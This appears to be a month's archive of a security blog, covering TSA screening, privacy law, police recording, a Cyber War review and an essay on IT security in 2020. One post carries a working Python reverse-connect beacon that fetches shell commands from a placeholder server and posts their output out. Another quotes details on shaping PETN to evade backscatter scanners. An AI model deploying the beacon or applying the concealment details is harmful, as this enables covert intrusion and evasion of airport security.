Blog: December 2010 Archives

Friday Squid Blogging: Research into Squid Skin

DoD awarded a $6M grant to study squid skin:

“Our internal nickname for this project is ‘squid skin,’ but it is really about fundamental research,” said Naomi Halas, a nano-optics pioneer at Rice and the principal investigator on the four-year grant. “Our deliverable is knowledge—the basic discoveries that will allow us to make materials that are observant, adaptive and responsive to their environment.”

Halas said the project was inspired by the groundbreaking work of grant co-investigator Roger Hanlon, a Woods Hole marine biologist who has spent more than three decades studying the class of animals called cephalopods that includes the squid, octopus and cuttlefish. One of Hanlon’s many discoveries is that cephalopod skins contain opsins, the same type of light-sensing proteins that function in eyes.

“The presence of opsin means they have some primitive vision sensor embedded in their skin,” Halas said. “So the questions we have are, ‘What can we, as engineers, learn from the way these animals perceive light and color? Do their brains play a part, or is this totally downloaded into the skin so it’s not using animal CPU time?’”

Posted on December 31, 2010 at 4:08 PM · 3 Comments

TSA Inspecting Thermoses

This is new:

Adm. James Winnefeld told The Associated Press Friday that the Transportation Security Administration is “always trying to think ahead.” Winnefeld is the head of the U.S. Northern Command, which is charged with protecting the homeland.

TSA officials had said Thursday that in coming days, passengers flying within and to the U.S. may notice additional security measures related to insulated beverage containers such as thermoses.

Winnefeld says officials responsible for homeland security are always a bit more alert over the holiday season. He says there has been a lot of chatter online about potential terror activity, but nothing specific.

Posted on December 29, 2010 at 11:09 AM · 80 Comments

An Honest Privacy Policy

Funny:

The data we collect is strictly anonymous, unless you’ve been kind enough to give us your name, email address, or other identifying information. And even if you have been that kind, we promise we won’t sell that information to anyone else, unless of course our impossibly obtuse privacy policy says otherwise and/or we change our minds tomorrow.

There’s a lot more.

Posted on December 27, 2010 at 1:04 PM · 13 Comments

This Suspicious Photography Stuff Is Confusing

See:

Last week, Metro Transit Police received a report from a rider about suspicious behavior at the L’Enfant Plaza station and on an Orange Line train to Vienna.

The rider told Metro he saw two men acting suspiciously and videotaping platforms, trains and riders.

“The men, according to the citizen report, were trying to be inconspicuous, holding the cameras at their sides,” Metro spokesman Steven Taubenkibel says.

The rider was able to photograph the men who were videotaping and sent the photo to Metro Transit Police.

I assume the rider took that photo inconspicuously, too, which means that he’s now suspicious.

How will this all end?

EDITED TO ADD (12/27): In the comments I was asked about reconciling good profiling with this sort of knee-jerk photography=suspicious nonsense. It’s complicated, and I wrote about it here in 2007. This, from 2004, is also relevant.

Posted on December 27, 2010 at 6:12 AM · 102 Comments

PlugBot

Interesting:

PlugBot is a hardware bot. It’s a covert penetration testing device designed for use during physical penetration tests. PlugBot is a tiny computer that looks like a power adapter; this small size allows it to go physically undetected all the while powerful enough to scan, collect and deliver test results externally.

How do you use it?

Gain access to the target location (conference room?), plug the PlugBot in the nearest wall outlet and walk out. The PlugBot is configured to make an external connection (Wi-fi or Ethernet) to a specified IP address to receive instructions. Central Command allows the penetration tester to invoke scripts and applications. Output as a result of testing is encrypted and securely transmitted to the Drop Zone where data is imported into Central Command for analysis by the pen tester.

Note that it has a squid logo.
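
The workflow quoted above is a classic reverse-connect beacon: the implant initiates outbound connections, which firewalls usually permit, rather than listening for inbound ones, which they usually block. Here is a minimal sketch of that pattern in Python; the URLs and the JSON task format are hypothetical stand-ins, not PlugBot’s actual protocol, and HTTPS stands in for the encrypted transport the description mentions.

```python
# Minimal reverse-connect beacon sketch (hypothetical protocol, not PlugBot's).
# The device polls Central Command for a task, runs it, and posts the output
# to a drop zone. HTTPS provides the encrypted transport described above.
import json
import subprocess
import time
import urllib.request

COMMAND_URL = "https://203.0.113.10/tasks"      # hypothetical Central Command
DROPZONE_URL = "https://203.0.113.10/dropzone"  # hypothetical drop zone

def beacon_once() -> None:
    with urllib.request.urlopen(COMMAND_URL, timeout=30) as resp:
        task = json.load(resp)  # e.g. {"id": 7, "cmd": "nmap -sn 10.0.0.0/24"}
    if not task:
        return
    result = subprocess.run(task["cmd"], shell=True,
                            capture_output=True, text=True, timeout=600)
    report = json.dumps({"id": task["id"], "stdout": result.stdout}).encode()
    req = urllib.request.Request(DROPZONE_URL, data=report,
                                 headers={"Content-Type": "application/json"})
    urllib.request.urlopen(req, timeout=30)

while True:
    try:
        beacon_once()
    except Exception:
        pass            # stay quiet on errors; a covert device doesn't log loudly
    time.sleep(300)     # poll every five minutes
```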

Posted on December 24, 2010 at 1:14 PM · 45 Comments

Proprietary Encryption in Car Immobilizers Cracked

This shouldn’t be a surprise:

Karsten Nohl’s assessment of dozens of car makes and models found weaknesses in the way immobilisers are integrated with the rest of the car’s electronics.

The immobiliser unit should be connected securely to the vehicle’s electronic engine control unit, using the car’s internal data network. But these networks often use weaker encryption than the immobiliser itself, making them easier to crack.

What’s more, one manufacturer was even found to use the vehicle ID number as the supposedly secret key for this internal network. The VIN, a unique serial number used to identify individual vehicles, is usually printed on the car. “It doesn’t get any weaker than that,” Nohl says.
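
To see just how weak that is, consider a toy challenge-response exchange in which the key is derived from the VIN. This is a hypothetical construction for illustration only (real immobilizer protocols vary), but the point holds regardless: anyone who can read the windshield can compute the same key and answer any challenge.

```python
# Toy challenge-response with a VIN-derived key (hypothetical construction).
# The point: the "secret" is printed on the car, so an attacker who reads
# the windshield derives the same key and can answer any challenge.
import hashlib
import hmac
import os

def vin_key(vin: str) -> bytes:
    # Key derived entirely from the VIN, as the manufacturer reportedly did.
    return hashlib.sha256(vin.encode()).digest()

def respond(key: bytes, challenge: bytes) -> bytes:
    return hmac.new(key, challenge, hashlib.sha256).digest()

vin = "1HGBH41JXMN109186"           # printed on the dashboard, visible to anyone
challenge = os.urandom(16)          # sent by the engine control unit

legit = respond(vin_key(vin), challenge)
attacker = respond(vin_key(vin), challenge)   # attacker just read the VIN
assert legit == attacker            # "It doesn't get any weaker than that."
```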

Posted on December 23, 2010 at 2:02 PM · 32 Comments

Interview with the European Union Privacy Chief

Interesting interview with Viviane Reding, the vice president of the EU Justice Commission and head of privacy regulation:

The basic values in Europe are that we have the right to our own private, personal data. It’s mine. And if one agrees to give that data, then it is available. That is known as opt-in consent and we’ve had that as law since 1995.

[…]

Protection of individuals is not the question of voluntary action. For us, it is written in our charter of fundamental rights that everyone has the right to the protection of their data.

Differences in privacy law between the US and the EU are going to be a big issue in 2011.

Posted on December 23, 2010 at 5:59 AM · 22 Comments

Interview with TSA Administrator John Pistole

He’s more realistic than one normally hears:

So if they get through all those defenses, they get to Reagan [National Airport] over here, and they’ve got an underwear bomb, they got a body cavity bomb—what’s reasonable to expect TSA to do? Hopefully our behavior detection people will see somebody sweating, or they’re dancing on their shoes or something, or they’re fiddling with something. Our explosives specialists, they’ll do something – they do hand swabs at random, unpredictably. If that doesn’t work then they go through (the enhanced scanner). And these machines give the best opportunity to detect a non-metallic device, but they’re not foolproof.

[…]

We’re not in the risk elimination business. The only way you can eliminate car accidents from happening is by not driving. OK, that’s not acceptable. The only way you can eliminate the risk of planes blowing up is nobody flies.

He still ducks some of the hard questions.

I am reminded of my own interview from 2007 with then-TSA Administrator Kip Hawley.

Posted on December 22, 2010 at 12:27 PM · 57 Comments

Adam Shostack on TSA Threat Modeling

Good commentary:

I’ve said before and I’ll say again, there are lots of possible approaches to threat modeling, and they all involve tradeoffs. I’ve commented that much of the problem is the unmeetable demands TSA labors under, and suggested fixes. If TSA is trading planned responses to Congress for effective security, I think Congress ought to be asking better questions. I’ll suggest “how do you model future threats?” as an excellent place to start.

Continuing on from there, an effective systematic approach would involve diagramming the air transport system, and ensuring that everyone and everything who gets to the plane without being authorized to be on the flight deck goes through reasonable and minimal searches under the Constitution, which are used solely for flight security. Right now, there’s discrepancies in catering and other servicing of the planes, there’s issues with cargo screening, etc.

These issues are getting exposed by the red teaming which happens, but that doesn’t lead to a systematic set of balanced defenses.

As long as the President is asking “Is this effective against the kind of threat that we saw in the Christmas Day bombing?” we’ll know that the right threat models aren’t making it to the top.

Posted on December 22, 2010 at 7:15 AM · 32 Comments

Recording the Police

I’ve written a lot on the “War on Photography,” where normal people are harassed as potential terrorists for taking pictures of things in public. This article is different; it’s about recording the police:

Allison’s predicament is an extreme example of a growing and disturbing trend. As citizens increase their scrutiny of law enforcement officials through technologies such as cell phones, miniature cameras, and devices that wirelessly connect to video-sharing sites such as YouTube and LiveLeak, the cops are increasingly fighting back with force and even jail time—and not just in Illinois. Police across the country are using decades-old wiretapping statutes that did not anticipate iPhones or Droids, combined with broadly written laws against obstructing or interfering with law enforcement, to arrest people who point microphones or video cameras at them. Even in the wake of gross injustices, state legislatures have largely neglected the issue. Meanwhile, technology is enabling the kind of widely distributed citizen documentation that until recently only spy novelists dreamed of. The result is a legal mess of outdated, loosely interpreted statutes and piecemeal court opinions that leave both cops and citizens unsure of when recording becomes a crime.

This is all important. Being able to record the police is one of the best ways to ensure that the police are held accountable for their actions. Privacy has to be viewed in the context of relative power. For example, the government has a lot more power than the people. So privacy for the government increases their power and increases the power imbalance between government and the people; it decreases liberty. Forced openness in government—open government laws, Freedom of Information Act filings, the recording of police officers and other government officials, WikiLeaks—reduces the power imbalance between government and the people, and increases liberty.

Privacy for the people increases their power. It also increases liberty, because it reduces the power imbalance between government and the people. Forced openness in the people—NSA monitoring of everyone’s phone calls and e-mails, the DOJ monitoring everyone’s credit card transactions, surveillance cameras—decreases liberty.

I think we need a law that explicitly makes it legal for people to record government officials when they are interacting with them in their official capacity. And this is doubly true for police officers and other law enforcement officials.

EDITED TO ADD: Anthony Graber, the Maryland motorcyclist in the article, had all the wiretapping charges cleared.

Posted on December 21, 2010 at 1:39 PM · 149 Comments

Book Review: Cyber War

Cyber War: The Next Threat to National Security and What to Do About It by Richard Clarke and Robert Knake, HarperCollins, 2010.

Cyber War is a fast and enjoyable read. This means you could give the book to your non-techy friends, and they’d understand most of it, enjoy all of it, and learn a lot from it. Unfortunately, while there’s a lot of smart discussion and good information in the book, there’s also a lot of fear-mongering and hyperbole. Since there’s no easy way to tell someone what parts of the book to pay attention to and what parts to take with a grain of salt, I can’t recommend it for that purpose. This is a pity, because parts of the book really need to be widely read and discussed.

The fear-mongering and hyperbole are mostly in the beginning. There, the authors describe the cyberwar of novels. Hackers disable air traffic control, delete money from bank accounts, cause widespread blackouts, release chlorine gas from chemical plants, and—this is my favorite—remotely cause your printer to catch on fire. It’s exciting and scary stuff, but not terribly realistic. Even their discussions of previous “cyber wars”—Estonia, Georgia, attacks against the U.S. and South Korea on July 4, 2009—are full of hyperbole. A lot of what they write is unproven speculation, but they don’t say that.

Better is the historical discussion of the formation of the U.S. Cyber Command, but there are important omissions. There’s nothing about the cyberwar fear-stoking that accompanied it: by the NSA’s General Keith Alexander, who became the first head of the command; by the NSA’s former director and current military contractor Mike McConnell, who is Senior Vice President at Booz Allen Hamilton; and by others. By hyping the threat, the former has amassed a lot of power, and the latter a lot of money. Cyberwar is the new cash cow of the military-industrial complex, and any political discussion of cyberwar should include this as well.

Also interesting is the discussion of the asymmetric nature of the threat. A country like the United States, which is heavily dependent on the Internet and information technology, is much more vulnerable to cyber-attacks than a less-developed country like North Korea. This means that a country like North Korea would benefit from a cyberwar exchange: they’d inflict far more damage than they’d incur. This also means that, in this hypothetical cyberwar, there would be pressure on the U.S. to move the war to another theater: air and ground, for example. Definitely worth thinking about.

Most important is the section on treaties. Clarke and Knake have a lot of experience with nuclear treaties, and have done considerable thinking about how to apply that experience to cyberspace. The parallel isn’t perfect, but there’s a lot to learn about what worked and what didn’t, and—more importantly—how things worked and didn’t. The authors discuss treaties banning cyberwar entirely (unlikely), banning attacks against civilians, limiting what is allowed in peacetime, stipulating no first use of cyber weapons, and so on. They discuss cyberwar inspections, and how these treaties might be enforced. Since cyberwar would be likely to result in a new worldwide arms race, one with a more precarious trigger than the nuclear arms race, this part should be read and discussed far and wide. Sadly, it gets lost in the rest of the book. And, since the book lacks an index, it can be hard to find any particular section after you’re done reading it.

In the last chapter, the authors lay out their agenda for the future, which I largely agree with.

  1. We need to start talking publicly about cyber war. This is certainly true. The threat of cyberwar is going to consume the sorts of resources we shoveled into the nuclear threat half a century ago, and a realistic discussion of the threats, risks, countermeasures, and policy choices is essential. We need more universities offering degrees in cyber security, because we need more expertise for the entire gamut of threats.
  2. We need to better defend our military networks, the high-level ISPs, and our national power grid. Clarke and Knake call this the “Defensive Triad.” The authors and I disagree strongly on how this should be done, but there is no doubt that it should be done. The two parts of that triad currently in commercial hands are simply too central to our nation, and too vulnerable, to be left insecure. And their value is far greater to the nation than it is to the corporations that own them, which means the market will not naturally secure them. I agree with the authors that regulation is necessary.
  3. We need to reduce cybercrime. Even without the cyber warriors bit, we need to do that. Cybercrime is bad, and it’s continuing to get worse. Yes, it’s hard. But it’s important.
  4. We need international cyberwar treaties. I couldn’t agree more about this. We do. We need to start thinking about them, talking about them, and negotiating them now, before the cyberwar arms race takes off. There are all kinds of issues with cyberwar treaties, and the book talks about a lot of them. However full of loopholes they might be, their existence will do more good than harm.
  5. We need more research on secure network designs. Again, even without the cyberwar bit, this is essential. We need more research in cybersecurity, a lot more.
  6. We need decisions about cyberwar—what weapons to build, what offensive actions to take, who to target—to be made as far up the command structure as possible. Clarke and Knake want the president to personally approve all of this, and I agree. Because of its nature, it can be easy to launch a small-scale cyber attack, and it can be easy for a small-scale attack to get out of hand and turn into a large-scale attack. We need the president to make the decisions, not some low-level military officer ensconced in a computer-filled bunker late one night.

This is great stuff, and a fine starting place for a national policy discussion on cybersecurity, whether it be against a military, espionage, or criminal threat. Unfortunately, for readers to get there, they have to wade through the rest of the book. And unless their bullshit detectors are already well-calibrated on this topic, I don’t want them reading all the hyperbole and fear-mongering that comes before, no matter how readable the book.

Note: I read Cyber War in April, when it first came out. I wanted to write a review then, but found that while my Kindle is great for reading, it’s terrible for flipping back and forth looking for bits and pieces to write about in a review. So I let the review languish. Finally, I borrowed a paper copy from my local library.

Some other reviews of the book Cyber War. See also the reviews on the Amazon page.

I wrote two essays on cyberwar.

Posted on December 21, 2010 at 7:23 AM · 32 Comments

Computational Forensics

Interesting article from IEEE Spectrum:

During two years of deliberation by the National Academy’s forensic science committee (of which I was a member), a troubling picture emerged. A large part of current forensics practice is skill and art rather than science, and the influences present in a typical law-enforcement setting are not conducive to doing the best science. Also, many of the methods have never been scientifically validated. And the wide variation in forensic data often makes interpretation exceedingly difficult.

[…]

So how might greater automation of classical forensics techniques help? New algorithms and software could improve things in a number of ways. One important area is to quantify the chance that the evidence is unique by applying various probability models.

[…]

Computational forensics can also be used to narrow down the range of possible matches against a database of cataloged patterns. To do that, you need a way to quantify the similarity between the query and each entry in the database. These similarity values are then used to rank the database entries and retrieve the closest ones for further comparison. Of course, the process becomes more complicated when the database contains millions or even hundreds of millions of entries. But then, computers are much better suited than people to such tedious and repetitive search tasks.
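
The ranking step described above is easy to sketch: represent each cataloged pattern as a feature vector, score every database entry’s similarity to the query, and return the closest few for human examination. A minimal version in Python, using cosine similarity over invented feature vectors (real forensic features and metrics are far more elaborate):

```python
# Minimal similarity ranking against a pattern database (illustrative only;
# real forensic features and similarity measures are far more elaborate).
import math

def cosine_similarity(a: list[float], b: list[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0

def top_matches(query, database, k=3):
    """Rank database entries by similarity to the query, best first."""
    scored = [(cosine_similarity(query, features), name)
              for name, features in database.items()]
    scored.sort(reverse=True)
    return scored[:k]

# Hypothetical feature vectors extracted from, say, toolmark profiles.
catalog = {
    "exhibit-041": [0.90, 0.10, 0.30],
    "exhibit-112": [0.20, 0.80, 0.50],
    "exhibit-207": [0.88, 0.15, 0.28],
}
print(top_matches([0.91, 0.12, 0.29], catalog))  # closest candidates first
```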

Posted on December 20, 2010 at 11:48 AM · 17 Comments

"Architecture of Fear"

I like the phrase:

Németh said the zones not only affect the appearance of landmark buildings but also reflect an ‘architecture of fear’ as evidenced, for example, by the bunker-like appearance of embassies and other perceived targets.

Ultimately, he said, these places impart a dual message—simultaneously reassuring the public while causing a sense of unease.

And in the end, their effect could be negligible.

“Indeed, overt security measures may be no more effective than covert intelligence techniques,” he said. “But the architecture aims to comfort both property developers concerned with investment risk and residents and tourists with the notion that terror threats are being addressed and that daily life will soon ‘return to normal.'”

My own essay on architecture and security from 2006.

EDITED TO ADD (1/13): Here’s the full paper. And some stuff from the Whole Building Design Guide site. Also see the planned U.S. embassy in London, which includes a moat.

Posted on December 20, 2010 at 5:55 AM · 32 Comments

Friday Squid Blogging: Prosthetic Tentacle

Impressive:

Designed for a class project while getting her degree at the Industrial Design Department at the University of Washington, Kaylene Kau has not only exploded perceptions of how prosthetic arms should look, but sent an entire subset of Japanese Hentai fans to their feet, cheering her on. If that’s not worth an employer’s attention, I don’t know what is. Good luck designing the future, Kaylene!

Posted on December 17, 2010 at 4:48 PM · 12 Comments

Hiding PETN from Full-Body Scanners

From the Journal of Transportation Security, “An evaluation of airport x-ray backscatter units based on image characteristics,” by Leon Kaufman and Joseph W. Carlson:

Abstract:

Little information exists on the performance of x-ray backscatter machines now being deployed through UK, US and other airports. We implement a Monte Carlo simulation using as input what is known about the x-ray spectra used for imaging, device specifications and available images to estimate penetration and exposure to the body from the x-ray beam, and sensitivity to dangerous contraband materials. We show that the body is exposed throughout to the incident x-rays, and that although images can be made at the exposure levels claimed (under 100 nanoGrey per view), detection of contraband can be foiled in these systems. Because front and back views are obtained, low Z materials can only be reliably detected if they are packed outside the sides of the body or with hard edges, while high Z materials are well seen when placed in front or back of the body, but not to the sides. Even if exposure were to be increased significantly, normal anatomy would make a dangerous amount of plastic explosive with tapered edges difficult if not impossible to detect.

From the paper:

It is very likely that a large (15-20 cm in diameter), irregularly-shaped, cm-thick pancake with beveled edges, taped to the abdomen, would be invisible to this technology, ironically, because of its large volume, since it is easily confused with normal anatomy. Thus, a third of a kilo of PETN, easily picked up in a competent pat down, would be missed by backscatter “high technology”. Forty grams of PETN, a purportedly dangerous amount, would fit in a 1.25 mm-thick pancake of the dimensions simulated here and be virtually invisible. Packed in a compact mode, say, a 1 cm×4 cm×5 cm brick, it would be detected.
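
The paper’s method, Monte Carlo simulation of photon transport, can be caricatured in a few lines of Python: sample each photon’s interaction depth from an exponential distribution and count interactions in the shallow layer a backscatter detector effectively images. The attenuation coefficients below are invented placeholders, not the paper’s values; the only point is that a low-Z explosive and soft tissue produce nearly indistinguishable signals.

```python
# Caricature of a Monte Carlo backscatter estimate (single-scatter model with
# invented attenuation coefficients -- placeholders, not the paper's physics).
import random

def backscatter_fraction(mu_per_cm: float, n: int = 100_000) -> float:
    """Fraction of photons interacting in the shallow layer (first 0.5 cm)
    that a backscatter unit effectively images."""
    hits = 0
    for _ in range(n):
        depth = random.expovariate(mu_per_cm)  # exponential free path length
        if depth < 0.5:
            hits += 1
    return hits / n

random.seed(1)
mu_tissue = 0.55       # placeholder linear attenuation for soft tissue
mu_explosive = 0.52    # placeholder for a low-Z plastic explosive

print(f"tissue:    {backscatter_fraction(mu_tissue):.3f}")
print(f"explosive: {backscatter_fraction(mu_explosive):.3f}")
# Near-identical fractions illustrate why a low-Z pancake taped to the
# abdomen blends into normal anatomy in these images.
```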

EDITED TO ADD (1/12): Stephen Colbert on the issue.

Posted on December 17, 2010 at 2:13 PM · 55 Comments

Did the FBI Plant Backdoors in OpenBSD?

It has been accused of it.

I doubt this is true. One, it’s a very risky thing to do. And two, there are more than enough exploitable security vulnerabilities in a piece of code that large. Finding and exploiting them is a much better strategy than planting them. But maybe someone at the FBI is that dumb.

EDITED TO ADD (12/17): Further information is here. And a denial from an FBI agent.

Posted on December 17, 2010 at 10:49 AM · 72 Comments

Fake Amazon Receipt Generators

They can be used to scam Amazon Marketplace merchants:

What happens once our scammer is armed with his fake receipt? Well, many sellers on Amazon will ask you to send them a copy of your receipt should you run into trouble, have orders go missing, lose your license key for a piece of software and so on. The gag here is that the scammer is relying on the seller not checking the details and accepting the printout at face value. After all, how many sellers would be aware somebody went to the trouble of creating a fake receipt generator in the first place?

They’re also useful if you want to defraud your employer on expense reimbursement forms.

Posted on December 17, 2010 at 6:28 AM · 20 Comments

Security in 2020

There’s really no such thing as security in the abstract. Security can only be defined in relation to something else. You’re secure from something or against something. In the next 10 years, the traditional definition of IT security—that it protects you from hackers, criminals, and other bad guys—will undergo a radical shift. Instead of protecting you from the bad guys, it will increasingly protect businesses and their business models from you.

Ten years ago, the big conceptual change in IT security was deperimeterization. A wordlike grouping of 18 letters with both a prefix and a suffix, it has to be the ugliest word our industry invented. The concept, though—the dissolution of the strict boundaries between the internal and external network—was both real and important.

There’s more deperimeterization today than there ever was. Customer and partner access, guest access, outsourced e-mail, VPNs; to the extent there is an organizational network boundary, it’s so full of holes that it’s sometimes easier to pretend it isn’t there. The most important change, though, is conceptual. We used to think of a network as a fortress, with the good guys on the inside and the bad guys on the outside, and walls and gates and guards to ensure that only the good guys got inside. Modern networks are more like cities, dynamic and complex entities with many different boundaries within them. The access, authorization, and trust relationships are even more complicated.

Today, two other conceptual changes matter. The first is consumerization. Another ponderous invented word, it’s the idea that consumers get the cool new gadgets first, and demand to do their work on them. Employees already have their laptops configured just the way they like them, and they don’t want another one just for getting through the corporate VPN. They’re already reading their mail on their BlackBerrys or iPads. They already have a home computer, and it’s cooler than the standard issue IT department machine. Network administrators are increasingly losing control over clients.

This trend will only increase. Consumer devices will become trendier, cheaper, and more integrated; and younger people are already used to using their own stuff on their school networks. It’s a recapitulation of the PC revolution. The centralized computer center concept was shaken by people buying PCs to run VisiCalc; now it’s iPads and Android smart phones.

The second conceptual change comes from cloud computing: our increasing tendency to store our data elsewhere. Call it decentralization: our email, photos, books, music, and documents are stored somewhere, and accessible to us through our consumer devices. The younger you are, the more you expect to get your digital stuff on the closest screen available. This is an important trend, because it signals the end of the hardware and operating system battles we’ve all lived with. Windows vs. Mac doesn’t matter when all you need is a web browser. Computers become temporary; user backup becomes irrelevant. It’s all out there somewhere—and users are increasingly losing control over their data.

During the next 10 years, three new conceptual changes will emerge, two of which we can already see the beginnings of. The first I’ll call deconcentration. The general-purpose computer is dying and being replaced by special-purpose devices. Some of them, like the iPhone, seem general purpose but are strictly controlled by their providers. Others, like Internet-enabled game machines or digital cameras, are truly special purpose. In 10 years, most computers will be small, specialized, and ubiquitous.

Even on what are ostensibly general-purpose devices, we’re seeing more special-purpose applications. Sure, you could use the iPhone’s web browser to access the New York Times website, but it’s much easier to use the NYT’s special iPhone app. As computers become smaller and cheaper, this trend will only continue. It’ll be easier to use special-purpose hardware and software. And companies, wanting more control over their users’ experience, will push this trend.

The second is decustomerization—now I get to invent the really ugly words—the idea that we get more of our IT functionality without any business relationship. We’re all part of this trend: every search engine gives away its services in exchange for the ability to advertise. It’s not just Google and Bing; most webmail and social networking sites offer free basic service in exchange for advertising, possibly with premium services for money. Most websites, even useful ones that take the place of client software, are free; they are either run altruistically or to facilitate advertising.

Soon it will be hardware. In 1999, Internet startup FreePC tried to make money by giving away computers in exchange for the ability to monitor users’ surfing and purchasing habits. The company failed, but computers have only gotten cheaper since then. It won’t be long before giving away netbooks in exchange for advertising will be a viable business. Or giving away digital cameras. Already there are companies that give away long-distance minutes in exchange for advertising. Free cell phones aren’t far off. Of course, not all IT hardware will be free. Some of the new cool hardware will cost too much to be free, and there will always be a need for concentrated computing power close to the user—game systems are an obvious example—but those will be the exception. Where the hardware costs too much to just give away, however, we’ll see free or highly subsidized hardware in exchange for locked-in service; that’s already the way cell phones are sold.

This is important because it destroys what’s left of the normal business relationship between IT companies and their users. We’re not Google’s customers; we’re Google’s product that they sell to their customers. It’s a three-way relationship: us, the IT service provider, and the advertiser or data buyer. And as these noncustomer IT relationships proliferate, we’ll see more IT companies treating us as products. If I buy a Dell computer, then I’m obviously a Dell customer; but if I get a Dell computer for free in exchange for access to my life, it’s much less obvious whom I’m entering a business relationship with. Facebook’s continual ratcheting down of user privacy in order to satisfy its actual customers—the advertisers—and enhance its revenue is just a hint of what’s to come.

The third conceptual change I’ve termed depersonization: computing that removes the user, either partially or entirely. Expect to see more software agents: programs that do things on your behalf, such as prioritize your email based on your observed preferences or send you personalized sales announcements based on your past behavior. The “people who liked this also liked” feature on many retail websites is just the beginning. A website that alerts you if a plane ticket to your favorite destination drops below a certain price is simplistic but useful, and some sites already offer this functionality. Ten years won’t be enough time to solve the serious artificial intelligence problems required to fully realize intelligent agents, but the agents of that time will be both sophisticated and commonplace, and they’ll need less direct input from you.

Similarly, connecting objects to the Internet will soon be cheap enough to be viable. There’s already considerable research into Internet-enabled medical devices, smart power grids that communicate with smart phones, and networked automobiles. Nike sneakers can already communicate with your iPhone. Your phone already tells the network where you are. Internet-enabled appliances are already in limited use, but soon they will be the norm. Businesses will acquire smart HVAC units, smart elevators, and smart inventory systems. And, as short-range communications—like RFID and Bluetooth—become cheaper, everything becomes smart.

The “Internet of things” won’t need you to communicate. The smart appliances in your smart home will talk directly to the power company. Your smart car will talk to road sensors and, eventually, other cars. Your clothes will talk to your dry cleaner. Your phone will talk to vending machines; they already do in some countries. The ramifications of this are hard to imagine; it’s likely to be weirder and less orderly than the contemporary press describes it. But certainly smart objects will be talking about you, and you probably won’t have much control over what they’re saying.

One old trend: deperimeterization. Two current trends: consumerization and decentralization. Three future trends: deconcentration, decustomerization, and depersonization. That’s IT in 2020—it’s not under your control, it’s doing things without your knowledge and consent, and it’s not necessarily acting in your best interests. And this is how things will be when they’re working as they’re intended to work; I haven’t even started talking about the bad guys yet.

That’s because IT security in 2020 will be less about protecting you from traditional bad guys, and more about protecting corporate business models from you. Deperimeterization assumes everyone is untrusted until proven otherwise. Consumerization requires networks to assume all user devices are untrustworthy until proven otherwise. Decentralization and deconcentration won’t work if you’re able to hack the devices to run unauthorized software or access unauthorized data. Decustomerization won’t be viable unless you’re unable to bypass the ads, or whatever the vendor uses to monetize you. And depersonization requires the autonomous devices to be, well, autonomous.

In 2020—10 years from now—Moore’s Law predicts that computers will be 100 times more powerful. That’ll change things in ways we can’t know, but we do know that human nature never changes. Cory Doctorow rightly pointed out that all complex ecosystems have parasites. Society’s traditional parasites are criminals, but a broader definition makes more sense here. As we users lose control of those systems and IT providers gain control for their own purposes, the definition of “parasite” will shift. Whether they’re criminals trying to drain your bank account, movie watchers trying to bypass whatever copy protection studios are using to protect their profits, or Facebook users trying to use the service without giving up their privacy or being forced to watch ads, parasites will continue to try to take advantage of IT systems. They’ll exist, just as they always have existed, and, like today, security is going to have a hard time keeping up with them.

Welcome to the future. Companies will use technical security measures, backed up by legal security measures, to protect their business models. And unless you’re a model user, the parasite will be you.

This essay was originally written as a foreword to Security 2020, by Doug Howard and Kevin Prince.

Posted on December 16, 2010 at 6:27 AM · 82 Comments

Realistic Masks

They’re causing problems:

A white bank robber in Ohio recently used a “hyper-realistic” mask manufactured by a small Van Nuys company to disguise himself as a black man, prompting police there to mistakenly arrest an African American man for the crimes.

In October, a 20-year-old Chinese man who wanted asylum in Canada used one of the same company’s masks to transform himself into an elderly white man and slip past airport security in Hong Kong.

Authorities are even starting to think that the so-called Geezer Bandit, a Southern California bank robber believed for months to be an old man, might actually be a younger guy wearing one of the disguises made by SPFXMasks.

News coverage of the incidents has pumped up demand for the masks, which run from $600 to $1,200, according to company owner Rusty Slusser. But he says he’s not happy about it.

[…]

Slusser opened SPFXMasks in 2003. His six-person crew uses silicone that looks and feels like flesh, down to the pores. Each strand of hair (and it’s human hair) is sewn on individually. Artists methodically paint the masks to create realistic skin tones.

“I wanted to make something that looks so real that when you go out for Halloween no one can tell,” Slusser said. “It’s like ‘Mission: Impossible’: you pull it over your head one time and that’s it. It’s like a 10-hour makeup job in 10 seconds.”

He experimented until he found the right recipe for silicone that would seem like skin. A key discovery was that if the inside of the mask is smooth (even if the outside is bumpy with pores, a nose, and other features) it will stretch over most faces and move with facial muscles.

Posted on December 14, 2010 at 1:12 PM · 57 Comments

Sometimes CCTV Cameras Work

Sex attack caught on camera.

Hamilton police have arrested two men after a sex attack on a woman early today was caught on the city’s closed circuit television (CCTV) cameras.

CCTV operators contacted police when they became concerned about the safety of a woman outside an apartment block near the intersection of Victoria and Collingwood streets about 5am today.

Remember, though, that the test for whether the surveillance cameras are worth it is whether or not this crime would have been solved without them. That is, were the cameras necessary for arrest or conviction?

My previous writing on cameras.

EDITED TO ADD (12/17): When I wrote “remember, though, that the test for whether the surveillance cameras are worth it is whether or not this crime would have been solved without them,” I was being sloppy. That’s the test as to whether or not they had any value in this case.

Posted on December 13, 2010 at 2:01 PM · 50 Comments

CRB Check Backlash

Against stupid CRB checks:

Last January, Annabel Hayter, chairwoman of Gloucester Cathedral Flower Guild, received an email saying that she and her 60 fellow flower arrangers would have to undergo a CRB check. CRB stands for Criminal Records Bureau, and a CRB check is a time-consuming, sometimes expensive, pretty much always pointless vetting procedure that you must go through if you work with children or “vulnerable adults.” Everybody else had been checked: the “welcomers” at the cathedral door; the cathedral guides; the whole of the cathedral office (though they rarely left their room). The flower guild was all that remained.

The cathedral authorities expected no resistance. Though the increasing demand for ever tighter safety regulation has become one of the biggest blights on Britain today, we are all strangely supine: frightened not to comply. Not so Annabel Hayter. “I am not going to do it,” she said. And her act of rebellion sparked a mini-revolution among the other cathedral flower ladies. In total she received 30 letters from guild members who judged vetting to be either an invasion of privacy (which it certainly is), insecure (the CRB has a frightening tendency to return the wrong results), or unnecessary (they are the least likely paedophiles in the country). Several threatened to resign if forced to undergo it. Thus began the battle of Gloucester Cathedral, between the dean and the flower guild, a battle which is just reaching its final stage as The Spectator goes to press. First the guild asked why the checks were necessary. The answer turned out to be that the flower arrangers shared a toilet with the choirboys, and without checks there would be “paedophiles infiltrating the flower guild.”

I wrote about CRB checks in 2008.

Posted on December 13, 2010 at 6:42 AM · 60 Comments

NIST Announces SHA-3 Finalists (Skein is One of Them)

